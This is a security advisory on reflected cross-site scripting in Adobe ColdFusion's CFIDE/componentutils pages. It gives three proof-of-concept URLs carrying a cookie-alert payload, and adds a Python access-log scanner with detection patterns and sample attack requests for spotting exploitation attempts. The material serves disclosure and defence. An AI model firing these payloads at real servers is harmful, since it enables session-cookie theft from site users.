Release date:
Updated on:
Affected Systems:
Adobe ColdFusion
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49787
Adobe ColdFusion is a commercial web application server and development platform.
Adobe ColdFusion contains multiple reflected cross-site scripting vulnerabilities in the component utility pages under /CFIDE/componentutils/ (componentdetail.cfm and cfcexplorer.cfc): the values of the component, name and method request parameters are echoed into the response without being HTML-encoded. A remote attacker who lures a user into opening a crafted link can execute arbitrary script code in that user's browser in the context of the affected site and steal cookie-based authentication credentials.
<* Source: MustLive (mustlive@websecurity.com.ua)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
MustLive (mustlive@websecurity.com.ua) provides the following test methods:
http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Adobe
-----
Currently, the vendor has not provided a patch or upgrade. Users of the affected software are advised to follow the vendor's homepage for the latest version:
http://www.adobe.com
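While no vendor fix is available, operators can at least watch for attempts to exploit the pages named in the test method. The following is an added example (not from the advisory) that scans web server access-log lines for requests to the two affected CFIDE/componentutils pages whose parameter values contain markup or event-handler fragments after URL-decoding. The log lines, the combined-format regular expression and the function names are constructed for this illustration; adapt LOG_RE to your server's log format.

```python
"""Flag likely exploitation attempts against CFIDE/componentutils in access logs.

Added example for interim monitoring, not from the advisory. The sample log
lines are constructed in Apache combined format; LOG_RE is an assumption
that must be adapted for IIS, proxy or load-balancer logs.
"""
import re
import urllib.parse

# Apache "combined" access-log format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Pages named in the advisory; ColdFusion paths are matched case-insensitively.
WATCHED_PATHS = {
    "/cfide/componentutils/componentdetail.cfm",
    "/cfide/componentutils/cfcexplorer.cfc",
}

# Markup and script fragments that never belong in a component or method name.
SUSPICIOUS = re.compile(r"[<>]|javascript:|\bon\w+\s*=", re.IGNORECASE)


def decode_twice(value):
    """URL-decode twice so a double-encoded payload (%253C -> %3C -> <) is seen."""
    return urllib.parse.unquote(urllib.parse.unquote(value))


def is_attempt(target):
    """Return (parameter, decoded value) for a suspicious request target, else None."""
    parts = urllib.parse.urlsplit(target)
    if parts.path.lower() not in WATCHED_PATHS:
        return None
    params = urllib.parse.parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            decoded = decode_twice(value)
            if SUSPICIOUS.search(decoded):
                return name.lower(), decoded
    return None


def scan(lines):
    """Return one finding per log line that looks like an exploitation attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        hit = is_attempt(m.group("target"))
        if hit:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "param": hit[0],
                "value": hit[1],
            })
    return findings


# Constructed sample log (not real traffic): one benign request to the affected
# page, three attempts matching the advisory's test URLs (one double-encoded),
# and one unrelated request that contains markup but targets another page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2012:10:12:01 +0000] "GET /CFIDE/componentutils/componentdetail.cfm?component=cfc.mycomponent HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2012:10:13:44 +0000] "GET /CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 4180 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2012:10:13:45 +0000] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 3970 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2012:10:13:46 +0000] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=%253Cbody%2520onload%3Dalert(1)%253E HTTP/1.1" 200 3950 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2012:10:14:02 +0000] "GET /index.cfm?id=1%3Cscript%3E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} {f['param']}={f['value']!r}")
```

Decoding twice catches a double-encoded payload that a single decode would let through. A legitimate component or method name never needs `<`, `>`, `javascript:` or an `on...=` attribute, which is why the indicator list can stay short without swamping the findings with false positives; the check is deliberately restricted to the two affected pages so that markup in unrelated parameters does not fire this rule.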